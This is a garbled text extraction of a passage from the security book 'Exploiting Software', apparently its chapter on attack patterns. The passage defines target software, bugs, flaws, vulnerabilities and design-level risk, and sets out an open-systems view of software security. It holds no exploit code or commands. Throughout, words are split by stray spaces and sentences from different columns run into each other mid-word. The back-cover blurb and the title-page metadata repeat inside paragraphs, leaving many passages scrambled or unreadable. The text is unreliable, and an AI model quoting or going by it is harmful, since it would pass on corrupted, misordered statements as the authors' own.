.m cs.k ent.edu/ docs/ gener al/ hack er sdict/ .

at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . [ 20]

The ter m script kidd ie is used to descr ibe people w ho exploit computers using canned scr ipt s, often

This m - h ave book ou—and will cer t ainly e y ou. t ing bey ond he crust eat ed and distr ibutmedaybyshock other s.y Most scr iptitkiddies don't car e educat how h acks w or Get k , j ust that t hey dot w or k. scr ipt Scr k idiptdie t r eat t f ound in m any hacktoing book s, you wwillholearn abou kiddie is m a en derogator y comm ent, used connote a person has no r eal tskills and lever ages the w ork of other m alicious hacker s in the same w ay that a child might m aliciously shoot a loaded gun. Th is book is not for scr ipt kiddies.

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Soft war e sy st em s ar e, for t he m ost p ar t , pr opr iet ary , com plicat ed , and cust om m ade. Th is is w hy ex ploit ing soft ar e isitay nmont unddo er tnak is w hy a book lik e t his is r equir ed, When net w or kw secur echr ivial anisms oting. w orThis k and w e m ay only b e able t o scr at ch t he sur f ace. At t ack pat t er ns This is a dan gerou s book , bu t t h e w or ld is a dang er ous place. Kn ow in g mor e serv es t o pr ot ect y ou. Som e se p eop le mayincrgit icize t he r elease of t his in for m at ion, bu t ou r ph ilosoph y is t hat Rev er engineer k eepin g secr et s an d f ost er ing obscur it y only h ur t s us all in t h e end. We m ain t ain t hat put t in g at t acks ainst w ar egu ys w ill h elp t o relegat e a lar g e num ber of book sClassic lik e t hese int o ag t he hanserv ds ofert hsoft e good com mon soft w ar e secu rit y pr oblem s t o t h e dust bin of hist or y . Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Chapter 2. Attack Patterns On e ver y r eal pr oblem in com pu t er secur it y is t h e lack of com m only accep t ed t er min olog y. Soft war e secu r it y is no ex cep t ion. Con fu sion by t he pop ular pr ess ( w hich j um ps at t h e ch ance • Table of Content s t o cov er comp ut er secu rit y issues) doesn' t help. Nor does int ent ion al m isu se of t er m s by • I ndex un scr upu lous v endor s t r y ing t o con you int o bu ying t h eir w ar es. I n t h is sect ion w e' ll Expl oit ing Softw a re How to Br e ak Code inf orm ally def in e some t er m s t h at ar e used t hr ough out t he b ook. Som e p eop le m ay not agr ee By Grhegt he Hoglund aw w it w ay ,wGar e'ryeMcGr d ef ining and using t er ms. Su ff ice it t o say , our aim is clar it y an d consist ency , and w e t h ink car ving up t h e space our w ay m ak es sense f or t h is discussion. Pub lish er: Addison Wesley

ThePub f ir st m ost 17, im por Datand e: February 200 4t ant defin it ion is t h e t ar get . Half t he f un of exp loit in g sof t w are is pick in gI SBN: you r0- t20 ar1-get . A sof t w are pr ogr am t hat is un der act ive at t ack , eit her r em ot ely or 786 95 -8 locally , is called t ar get soft w ar e . Pages: 51 2

A t arg et could be a ser ver on t h e I n t ern et , a t elephon e sw it ch, or an isolat ed sy st em t hat cont r ols ant iair craf t capab ilit y . To at t ack a t arg et , it m ust be analy zed f or v ulner abilit ies. Som et im es t h is is called r isk assessm en t . I f a h igh- r isk v ulnerab ilit y is discov ered, it is r ipe for ex ploit at ion. Vulner abilit y is not an ex ploit , b ut it is necessar y for an ex ploit . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Soft e pint rod outect pu tion . Wh t ests,ing , want e observ soft war ou kt put er tmhe ine w het h er fir ewwar alls, ruuces sion det syile st em and iv ir us esoft war e en ot eep tino gdet out bad g uy s? a fau lt htas r esult a failur Thesoft m or e ou putis pr ov idped y t het he sofansw t w are, t h e easier it is t o What ools can ed be in u sed t o be. reak war e? tTh book rovbides er s. det ect f ault y int er nal st at es an d so for t h. Ob ser vab ilit y is t he pr ob abilit y t hat a f ailu re will b e 1] itTh Ex piceable lo i t in ginS ot he ft wou a re is loaded h ex e gr amp eatles er tof her eal ob ser at tvack abilit s, yat , t ack he easier pat t er it ns,is t tools, o t estana dgiv en not t put space. [ w piece t echniqu of sof es tused w ar e.bySoft bad w ar guy e st hat t o br preak odu ces sof t w n oarext e. Ierf nal y ou out w ant pu t t o h as p rot noect w ay y our t o ind sof ticat w areeafrfom ailu re. A at thack ighly , y ob ou ser m uvab st fir lestprlear ogr am n h ow m ight r ealbe at tone ackst hat are has really emcarr bedd ied ed ou debu t . g out pu t capab ilit y . A pr ogr am t hat n or mally h as low observ abilit y can be alt er ed using a debug ger t o p rov ide h igh This m ust - hyave book mld aybshock y ou—and it awill cert rt ainly y ou. Get ond, ftor he observ abilit . This w ou e t he case if a d at f low acer weducat er e atet ached t ot ing t h e bey t ar get scr ipt ple. k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t exam [ 1]

For mor e infor m ation on t he impor tance of obser vability and t esting, see Soft w ar e Fault I n j ect ion [ Voas

and McGr Why sofaw t w ,ar1999] e ex.ploit w ill con t inue t o be a ser ious p r oblem

Ex ploit ing soft h e idea do of ob When netwwar orek encom secur itpasses y m echt anisms n otser w vab or k ilit y , especially w hen w e t hink about r em ot e ex ploit s. Thr oug hout t he book w e discuss a n um ber of t echniqu es for im pr ov ing observ Atabilit t ack ypat . The t er ns basic id ea is t o gat her as m u ch inf or mat ion abou t a pr ogr am 's p ossible int er nal st at es as p ossible, bot h st at ically w hile it is b eing const r uct ed an d dy nam ically w hile er se it is r uRev nning . engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

A Taxonomy To m easur e r isk in a sy st em , vu ln er abilit ies m ust b e ident ified. One basic p rob lem is t hat soft w ar e v ulner abilit ies r em ain , f or t he m ost par t , un cat egor ized and unid en t if ied . Som e basic science ex ist s, b ut it is sket chy an d dat ed. Th e good new s is t hat du rin g t h e last f ew •y ear s, a lar gTable of Content s e body of specific soft war e ex ploit s hav e b een ident ified, d iscussed , and •pu blicized inI ndex v ar ious par t s of t he soft w ar e com m unit y . Expl oit ing Softw a re How to Br e ak Code

TwGroeg com m on , collect ionaw s of vu lnerab ilit ies include t he bu gt r aq m ailing list , w her e m any By Hoglund Gar y McGr exp loit s are fir st pu blicly d iscussed ( ht t p: / / w w w . bug t raq . com ) , an d t he CVE, w her e scient ist s and academ ics cat alog v ulnerab ilit ies. Not e t h at in t he ear ly 20 00s, bu gt r aq became a Pub lish er: Addison Wesley com mer cial en t er p rise now ex ploit ed by Sy m ant ec t o load t h eir p rop riet ar y dat ab ases ( w h ich Dat e: February 17, 200 4 t heyPub h appily r ent t o subscr ib er s) . Th e CVE, adm inist er ed b y Mit r e, is anot h er at t em p t t o I 0- 20 1-flaw 786 95dat -8 a in on e place. The pr oblem w it h t he CVE is t hat it lacks m u ch in t he collect bSBN: ug and 51 2 izat ion . w ay ofPages: cat egor The t wo for u ms we ment ion do begin t o allow resear cher s t o ascert ain t hat cer t ain soft w ar e bu gs com mon ly occu r in m an y div er se pr odu ct s. Th er e ar e, af t er all, a nu mb er of general pr oblem s in sof t w ar e. Alt h ough t w o sof t w ar e pr oduct s may su ffer f r om a p art icular in st ance of a bduf fer sof ov ter low br bug , ?t ak en tdo og et w itsh m otake her sof inst gener ofWhy p r oblem How oes wfare eak How ather t acker t wances, ar e braeak on palurclass pose? are s can be d ef ined. I n m any r esp ect s, a buf fer ov erf low look s t he sam e no m at t er w hich sof t w fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad gare uy s? pr odu ct it occur s in. What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. IEx np our abilit iesw(itbhotex h amp bug sles and e gs,rou oget her cent ran al d lo i tt ax in gonom S o ftyw, va ulner re is loaded of flaw r eals)atar t ack atped t ackt pat t er ns,byt ools, char act er ist ics and give rise t o par t icu lar at t ack pat t er ns. Th is is based on t he follow ing t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om pr Re la p rogr am in gr eal e r rors g iv eare ri se t o sim r ex at tem ackise: , y ou m tuestd fir st lear nm h ow at t acks really carri la ied ou pl t . oit t echn iqu es. Th us, w e aim t o cov er t he generic p r oblem s of sof t w are r at h er t han specif ic, k now n v ulner abilit ies. [ 2] A gener classificat ion pr ovid es a fry am ew orkitt hat used w hen in gt ing lar ge t w tare This malust - h ave book m ay shock ou—and will can cer t be ainly educat e yaudit ou. Get beysof ond he syst em s for vu ln er ab ilit ies t o under st and and assess r esu lt s. Su ch a fr am ew or k can help an scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t aud it or locat e sp ecific t yp es of sof t w are pr oblem s. Of cou rse, such in for m at ion is usef ul b ot h in defendin g sy st em s and in at t ack ing t hem . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem [ 2]

We w ill, of cour se, provide plenty of r eal examples thr oughout the text .

When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Bugs Rev er se engineer in g Abu g is a soft w ar e pr ob lem . Bug s m ay exist in code an d m ay n ev er be ex ecut ed . Alt houg h t he t er m bu gatist acks applied q uit eserv gener byarm Classic ag ainst er ally soft w e any sof t w are pr act it ion er s, w e r eser ve use of t he t er m t o encom pass f airly sim ple im plem ent at ion pr ob lem s. For ex am ple, m isu sin g strcpy() in C an Sur d pr C+ising + in at sut acks ch a w agay ainst t hatclien a b uff t soft er war overeflow con dit ion ex ist s is a b ug. For u s, bug s ar e im plem ent at ion - lev el pr oblem s t hat can b e easily " squ ash ed ." Bug s can ex ist only in code. f ore cr aft ingCod m aliciou inpuare t gr eat at findin g b ugs. DesigTech ns d oniqu noteshav b ugs. e scan sners The t echn ical det ails of b uf fer ov er f low s

Flaws Root k it s Ex p lo iist inalso g Sa o ft w awre f illed wit,h bu t hteat ools, con s, andatkn ledg elevel. necessar A flaw soft aris e pr ob lem flaw is a cept pr oblem a ow d eeper Flawyst oarbereak oft en soft w armor e. e sub t le t han simp ly an off - by - one er ror in an ar r ay ref er ence or t h e use of a m uch dan gerou s syst em call. A f law is inst ant iat ed in sof t w are cod e but is also pr esen t ( or absen t ! ) at t he d esign lev el. For ex am ple, sev er al classic flaw s ex ist in er r or han dling and r ecov er y syst em s t hat fail in an insecu re fashion. An ot her ex amp le is ex posur e t o cross- sit e scr ipt ing at t ack s t hr oug h p oor design. Flaw s m ay exist in soft war e an d m ay n ev er be ex ploit ed.

Vulnerabilities

Bug s and flaw s ar e v ulner abilit ies. A v ulnerab ilit y is a pr oblem t h at can be ex ploit ed b y an at t ack er . Th er e ar e m any k ind s of vu lnerab ilit y . Comp ut er secu rit y r esear chers hav e creat ed t ax onom ies of vu ln er ab ilit ies. [ 3] [ 3]

I van Kr usl and Car l Landw ehr are tw o scientists w ho have studied vulnerabilities and have built taxonom ies. See Kru sl [ 1998] and Lan dw ehr et al. [ 19 93] for m or e infor mation.

Secu rit y vu ln er abilit ies in sof t w are sy st ems ran ge f rom local im plem en t at ion er r or s ( e.g ., use •of t he gets() Table Content f unof ct ion calls in C/ C+ + ) , t h r ough int er pr oced ur al int er face err or s ( e. g. , a race •condit ion betI w ndex een an access cont r ol check and a f ile operat ion ) , t o m uch h igher design- lev el Expl How Br e ak Code m istoit aking es Softw ( e. g.a,reerr or htoandling an d r ecov er y sy st ems t hat fail in an insecur e f ashion, or obj shar ing, Gar syystMcGr em sawt h at m ist akenly includ e t r ansit ive t r u st issues [ 4] ) . By Grect eg -Hoglund [ 4]

A tr ansitiv e tr ust issue m ay occur w hen an obj ect is shar ed w ith an agent t hat m ay then go on to share

Pubthe lishobj er: ect Addison Wesley fur ther ( in a manner that can't be contr olled by the or iginal granter ) . I f you dole out a secret to som she may choose to shar e it, ev en if y ou don't w ant her to. Pub Datebody, e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

At t ack er s g en er ally don' t car e w het h er a v ulner abilit y is t he r esu lt of a flaw or a bu g, Pages: 51 2 alt hou gh bug s t end t o b e easier t o ex ploit . Som e v ulner abilit ies can be dir ect ly and com plet ely ex ploit ed ; ot h er s on ly pr ovid e a t oehold for a m or e comp lex at t ack . Vulner abilit ies can be defined in t er m s of code. The m or e com plex a v ulner abilit y, t he m or e code m ust be exam ined t o det ect it . Som et im es ju st look in g at code d oesn' t wor k t h ough . I n m anyd cases, lev el descrdo ipt at iont acker of w hat going t h an is av ailable in cod e How oes sofat whigh are er br eak ? How s m' sake sof t on w arot e her br eak on wh p uratpose? Why are is necessar y.ruI nsion m any cases, a st design descrant iptiv ion at soft a wwar hit eebnoard level n ecessar y. g Otuy h er fir ew alls, int det ect ion sy em s, and ir us ot k eep in gisout t he bad s? tWhat im es,t ools d et ailcan regar g tthe ionwar enve? ir on m ust b eides k now Su ff ice be du in sed o bexecut reak soft Thment is book p rov t hen.answ er s.it t o say t h at t h er e is a sign ificant diff er ence bet w een t r iv ial pr ogr am er ror s ( b ugs) and arch it ect ur al f law s. Exivial p lo i ter inr g S ocan ft wof a re h single ex ampline les of eal e, at twh ackers,eas at tdesign ack patflaw t er ns, t ools,ean Tr ors t enisbloaded e fix ed winit a of r cod s r equir ad used t o br eakmsof w ar ar e. eas. I f y ou w ant t o p rot ect y our sof t w ar e fr om rt echniqu ed esign es t h at almby ostbad alwguy ay sst ouches ult tiple at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . For exam ple, w e can usually det er mine t hat a call t o gets() in a C/ C+ + p r ogr am can b e Thisloit m ed ust -inh ave m ayflow shock y ou—and it kn willowin cer g t ainly e y ou. t ingofbey ond t he it s exp a bubook ff er over at t ack wit h out an yt educat hing about t hGet e rest t he code, scr ipt k id t r teat m en t f ound m anyion hack ingonm book s,. you w illloit learn abou design, ordie any hing abou t t h e in execut en vir ent To exp a buf fer tov er f low in gets(), t he at t acker ent er s m alicious t ex t t o a st an dar d pr ogr am inp ut locat ion. Hen ce, a gets() v ulner abilit y can b e det ect ed w it h g ood pr ecision u sing a ver y simp le lex ical analy sis. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Mor e com plex vu ln er ab ilit ies inv olve in t er act ions am ong m or e t han on e locat ion in t he code. When or kr ace secur it ydit mions, ech anisms do ple, n ot w or k s on m ore t han sim ply an alyzing an Pr ecisely d etnet ectwing con f or exam depend isolat ed line of code. I t m ay d ep en d on k now ing ab out t he behav ior of sev er al fu nct ions, At t ack pat t er ns un derst an ding shar in g amon g global v ar iables, an d hav in g kn owledg e of t he OS pr ov iding t he ex ecu t ion env ir onm ent . Rev er se engineer in g Becau se at t acks ar e b ecom ing m ore sop hist icat ed, t he not ion of w hat k in d of vu ln er abilit ies Classic at t acks ag ainst serv er soft w ar e act ually m at t er is const ant ly chan ging. Timin g at t ack s ar e now comm on, w hereas on ly a f ew y ear sSur ag oprtising h ey watert acks e consid er ed clien ex ot tic.soft Sim ilar ag ainst war e ly , t w o- st age b uff er over flow at t acks in volv ing t he use of t ram polines w er e once t he dom ain of sof t w are scien t ist s, but ar e now u sed in 0day exp loit s. niqu es f or cr aft ing m aliciou s inpu t Tech The t echn ical det ails of b uf fer ov er f low s

Design Vulnerabilities Root k it s Desig level carwit r yht ht hise t trend t her . Unfor natow ely, ascert ain in g ywh Ex p loni t in g Svouln ft wera abilit re is fies illed ools,f ur con cept s, andt ukn ledg e necessar t oetb her reaka pr ogr am h as designlevel v uln er abilit ies requ ires g reat ex per t ise. Th is m akes f in ding designsoft w ar e. level f laws not only har d t o d o, bu t par t icular ly har d t o au t om at e. Design - lev el pr oblem s app ear t o be pr ev alent and are at t h e ver y least a cr it ical cat eg ory of secur it y risk in code. Micr osof t r epor t s t h at ar oun d 5 0% of t he pr ob lem s un cov er ed du rin g t he " secu rit y p ush" of 20 02 w er e d esign- lev el pr oblems. [ 5] Clear ly , m ore at t en t ion mu st be p aid t o design pr oblems t o addr ess sof t w ar e secur it y r isk s p rop er ly . [ 5]

Michael How ar d, per sonal com munication.

Con sider an er ror hand lin g an d recover y syst em . Failu re recover y is an essent ial aspect of

secur it y eng in eer ing. But it 's also com plicat ed , r eq uir in g in t eract ion bet w een failur e m odels, r ed und ant desig ns, and defense ag ain st denial- of - ser v ice at t ack s. I n an ob ject - orient ed pr ogr am , u nder st an ding w het her an er ror hand lin g an d r ecover y syst em is secu re in volv es ascer t aining a pr opert y or pr oper t ies sp read t hr oug hout a m u lt it ude of classes t h at ar e t hem selv es sp r ead t hr ou ghout t h e desig n. Er r or d et ect ion cod e is usually pr esent in each obj ect and m et hod, an d er r or - hand lin g code is usually sep arat e and dist inct f rom t he det ect ion code. Som et imes ex cept ion s pr opag at e up t o t he sy st em lev el and ar e hand led by t• he machin eTable r unnin g t he code ( e. g. , Jav a 2 VM except ion hand lin g) . Th is m akes it quit e of Content s dif ficult t o det er min e w het her a g iven er r or h andling and r ecov ery design is secu re. Th is • I ndex pr oblem is ex acer bat ed in t r an sact ion- b ased syst em s com m only u sed in com m ercial eExpl oit ing Softw a re How to Br e ak Code com mer ce solu t ion s, in w h ich fu nct ionalit y is dist r ibut ed am ong m any dif fer en t com ponent s By Gr eg Hoglund , Gar r unn ing on sev er yalMcGr servaw er s. Ot hPub er lish ex am ples ofWesley desig n- level p rob lem s includ e object sh aring an d t r u st issues, un pr ot ect ed er: Addison dat aPub chann els ( b ot h t ern Dat e: February 17,in200 4 al and ext er nal) , in cor r ect or m issing access cont r ol mechanism s, lack of I SBN: audit0-ing / logging or in cor r ect loggin g, or der ing and t im in g er r ors ( especially in 20 1- 786 95 -8 m ult it hr eaded sy st ems) , an d man y ot her s. For mor e on design pr oblem s in sof t w are an d how Pages: 51 2 t o avoid t hem , see Build ing Secu re Soft w ar e [ Viega and McGr aw , 20 01] .

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

An Open-Systems View Building a t ax onom y of sof t w ar e v ulnerab ilit ies is n ot a new idea. How ever , t he few pu blish ed app roaches ar e ou t dat ed, an d in gener al t h ey fail t o t ak e a sy st em w ide v iew of t he p rob lem . The t rad it ion of b uilding fau lt t ax onom ies oft en at t em pt s t o separ at e cod in g fault s an d •" em er gent fau Table lt s"of( tContent hose r selat ed t o config ur at ion an d so for t h) , and t r eat t hem as separ at e, •independ en t I ndex p rob lem s [ Kr usl, 19 98] . [ 6] Th e pr oblem is t h at soft war e r isk can on ly be Expl oit ing How to Br e ak iv Code m easu redSoftw anda re assessed r elat e t o a par t icular env ir onm en t . This is b ecause, in some cases, a p ot ially fat aly at t ack By Gr egent Hoglund , Gar McGr aw ult im at ely p oses n o r isk if t he f ir ew all successf ully block s it . Alt hou gh a giv en p iece of t ar get sof t w ar e m ay it self be ex ploit able, t he su rr oun ding envPub iron ment m ay pr ot ect it fr om har m ( if a fir ewall get s luck y or an int r usion d et ect ion lish er: Addison Wesley syst em cat ches an at t ack befor e an y dam age is d one) . Sof t w are is alw ay s par t of a lar ger Pub Dat e: February 17, 200 4 syst em of conn ect ed har dw ar e, lan guag e t ech nologies, and pr ot ocols. The env iron ment issu e I SBN: 0- 20 1- 786 95 -8 is a doubleedge sw or d, how ev er , because m any t im es t he env ir onm en t h as a n eg at ive Pages: 51 2w ar e r isk. im pact on soft [ 6]

The 1978 Protect ion Analysis study ( called PA) and the 1976 RI SOS study ar e ear ly att em pts at vulner ability classification.

The con cept of " open sy st ems" w as fir st int r od uced in t her mod yn amics b y von Ber t alanff y . [ 7] How sof are br eak ?isHow atost t acker s mtake t wsy arst e em br eak ons pas urapose? are er The f d unoes dam ent w t al concept t hatdo alm ev ery echnsof ical ex ist par t Why of a larg fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? w hole, and all t h e comp onent s ar e in a st at e of con st an t int er act ion. As a r esult , risk analy sis Whatevt olved ools can be usider sed ttoh eb reak softatwar is bookbot p rov ides hesansw s. s. Som e has t o con syst em m e? anyThlevels: h sup er tset and er subset app roaches f or m easu ring soft war e r isk m ay not con sid er t he env iron m en t as an essent ial Ex Sor o fty w a re ris amp les at t ack parpt lo ofi ttin heg st , but iskloaded can notw it bh e ex m easur ed of outr eal of con t exs, t . at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack[ 7], yTooulear mnu about st fir stLudw lear h ow eal at t acks carr ied ou tLVB.ht . ignvon Berrtalanffy, go to are http:really / / w w w .isss.or g/ lum m. This m ustex - ham aveple book m ay shock ou—and it will ceronst t ainly y ou. ing ram bey ond A classic of an en vir onmyent al ef fect is d em r ateducat ed by et ak ingGet a pt rog t hat t he has scr ipt su k id die t rully eat m f ound m any you w illa learn been ccessf ruen n twit h n o in secur it y hack p rob ing lem sbook f or s, y ear s on pr oprabou iet ar yt n et w or k an d pu t t ing it on t h e I n t ern et . The r isks chan ge, im mediat ely and r adically. For r easons like t hese, it m ak es lit t le sense t o con sid er cod e separ at e fr om any kn owledg e about t he fir ew all sof t w ar e ex ploit ill con seroper iousatpe. r oblem or t h eWhy business cont ext in wwhich t hteinue softtwoarbe ea w ill Lik ew ise it d oesn' t m ak e sense t o t r eat int r u sion det ect ion as an at om ic net w or k - lev el comp onent divor ced f r om t he sof t w are When net w or k secur it y m ech anisms do n ot w or k t hat should be mon it ored. The f act is, sof t w ar e comm u nicat es ov er net w or ks, an d sim ple conf ig ur at ion set t ing s can leav e gapin g secu r it y holes. Th en ag ain , pr oper f irew all set t ings At t ack pat t er ns can som et imes chok e of f an at t ack t hat w ould ot herw ise w ipe out a Web serv er. Rev er se engineer in g I n t he end, separ at in g code fr om t he en vir onm ent t hat it ult im at ely r uns in t u rn s out t o b e an ar t ificial and at mtisleading w ay serv of der raw ingwaarboun dar y in t he syst em . I n fact , such boun dar ies Classic acks ag ainst soft e end up being of lit t le r eal use. The com plicat in g f act or is t hat a sy st em can be br oken dow n int o mSur any ponent s oft soft var ywar ingedegr ees of d et ail. A syst em v iew ed t his w ay is pr hier isingarchical at t ackscom ag ainst clien a collect ion of m any com ponent s or obj ect s ex ist in g at m y riad levels. Each piece of soft war e in a sy st em can e vm iew ed ass ainpu collect Tech niqu eslikew f or crise aftbing aliciou t ion of m any com ponent s or obj ect s at diff erent levels. At alm ost an y lev el of gr anu lar it y , t h ese obj ect s com m un icat e w it h each ot h er . The t echn ical det ails of b uf fer ov er f low s Mod er n sy st ems are com plex and inv olv e int eract ions at m any diff er ent lev els. Th e up sh ot of Root it s t he st and ar d Tow er - of- Han oi– lik e concept ion of " st ack ed" applicat ions ( Figur e all t h is is tkhat 2- 1 ) is ver y m isleading . High- lev el applicat ions call dir ect ly in t o v er y low - level OS const r uct s p lo iat t int g o ftOS w alev re el) is ,f illed t h et han t ools, con s, and kn.ow necessar y t o clean b reak, (Ex even heSBI mor ewit ofht en man y cept people t h ink Soledg insteead of a nice, soft w ar e. com m un icat ion hier archy wit h ev er y t hing neat ly callin g only it s " im m ed iat ely or ganized sur r ound in g" lev els, alm ost ev er y t hing can com m un icat e w it h alm ost ever y t hing else on all sort s of disjoint lev els. This m akes b uilding a p rot ect ion dom ain som ew hat t rick y, if n ot n ig h on imp ossible. Gr oup s and dom ains can exist arou nd any set of ob ject s, and ult im at ely any obj ect inv olv es bot h code an d con figu rat ion . Ult im at ely, en vir onm ent r eally m at t er s, and t r y in g t o t r eat code separ at e f rom t he env ir onm en t is d oom ed t o fail.

Figu r e 2 - 1 . A t yp ica l con cep t ua l vi ew of sof t w ar e a ppl icat i ons ( Ap p) a s ne st ed hi er a r ch ica l st r uct u r es. The r e al it y is t h a t a ppl ica t i ons a r e n ot a s ni ce ly "st a ck e d" a s t h e y appe a r t o be he r e . Thi s fi gu r e w a s cr e at ed by Ed Fe lt en of Pr in ce t on Un iv er sit y.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Most w ork y book s f ocu s only on tare he en vir onm at t ack( ,net y ou m u) stsecur fir stitlear n h ow r eal at t acks really carrent ied arou ou t . nd sof t w ar e. They t alk abou t f ixing secu rit y pr oblem s at t he rou t er, t he f ir ew all, or by in st alling int r usion det ect ion Thiswm h aver ecen bookt ly m ay ou—and willbook cer t sainly educat e y ou. Get t ingeloping bey ond t he e soft arust e. -Only ( in shock 2 001 )yw er e t he itf irst dedicat ed solely t o dev secur scr ipt t r eat m en t f ing ound in m youd w ill learn[ 200 abou soft w ark id e die r eleased ( Build Secu reany Softhack w ar eing b ybook Viegs,a an McGraw 1]t , an d Wr it ing Secu re Code b y Michael How ar d an d David LeBlanc [ 200 2] ) . Why sof t w lart oe divid ex ploit w ill oaches con t inue ious subf p r oblem We f ind it usefu e appr intt o tbe w oa dser ist inct ields: sof t w ar e secur it y and app licat ion secur it y . When net w or k secur it y m ech anisms do n ot w or k So f t w ar e se cu ri t y d ef ends ag ainst soft war e ex ploit b y buildin g sof t w are t o be secur e in t he t ackmpat er ns fir st pAt lace, osttly by g et t in g t he design r ig ht ( w hich is h ard ) an d av oiding com m on m ist ak es ( w hich is easy ) . I ssu es cr it ical t o t his subf ield include: sof t w are risk m anag em ent , ering se engineer in gand plat f orm s, aud it ing sof t w ar e, desig ning for secur it y, secur it y pr ogr Rev am m langu ages flaw s ( b uf fer ov er f low s, r ace condit ions, access con t rol and passwor d pr oblem s, r andom ness, Classic at t acks ag ainst serv er soft w ar e cry pt ogr aphic er r ors, an d so on) , an d t est ing f or secur it y . Soft w ar e secu rit y is most ly be secur concerSur n ed w it h desig ning w ar e t ot soft pr ising at t acks agsoft ainst clien war ee, mak ing sur e t hat soft w ar e is secur e, and educat ing soft w ar e d ev elop er s, ar chit ect s, an d user s. Tech niqu es f or cr aft ing m aliciou s inpu t Ap p li ca t i o n se cu ri t y d ef ends ag ainst soft war e ex ploit in a post fact o w ay , af t er dev elop isical comp e. Ap secu ritsy t echn olog y enfor ces r easonab le policy ab out Thement t echn detlet ails of bplicat uf ferion ov er f low t he kind s of t hin gs t hat can ru n, h ow t hey can ch ange, an d wh at t h e soft w ar e does as it is r unn ing. RootI kssues it s crit ical t o t his sub field includ e sandbox ing code, pr ot ect ing against malicious code, locking d own ex ecut ab les, m onit or ing pr ogr am s as t hey ru n, enf or cing soft war e u se policy it hg tSechn , and ex t ensib le sy ems. Ex p lo iw t in o ft wology a re is f illeddealing wit h t hweitthools, con cept s,stand kn ow ledg e necessar y t o b reak soft w ar e. Not e t h at b ot h of t hese sub fields m ust be considered w hen ex ploit ing soft w ar e.

Risk By giv ing par t icular sor t s of v ulnerab ilit ies a nam e, w e can b eg in t o at t r ibut e risk levels t o t hese v ulner abilit ies. On ce a r isk is associat ed w it h a n amed soft w ar e bu g or flaw , an ent er pr ise can calculat e wh er e b udg et s need t o be allocat ed t o r ed uce r isk . On t h e ot her

han d, an at t ack er can use t h e same dat a t o calcu lat e t he lik elihood of lever aging t h e m ost " ban g for t h e bug . " Clear ly, som e v ulner abilit ies cost less t o ex ploit , j ust as som e v ulner abilit ies cost less t o m end. Risk descr ibes t h e likelihood t hat a g iv en act iv it y or com binat ion of act iv it ies will lead t o a soft w ar e or sy st em failur e and , as a result , u naccept ab le r esour ce dam age will occur . To som e degr ee, all act iv it ies ex pose soft w ar e t o pot ent ial fault y behav ior . Th e lev el of exp osu r e m ay v ary depending on t he reliabilit y of t he sof t w are, t h e am ount of QA t est ing per for m ed • Table of Content s against t he sof t w are, an d t he r unt im e env ir onm en t of t h e soft w ar e. •

I ndex

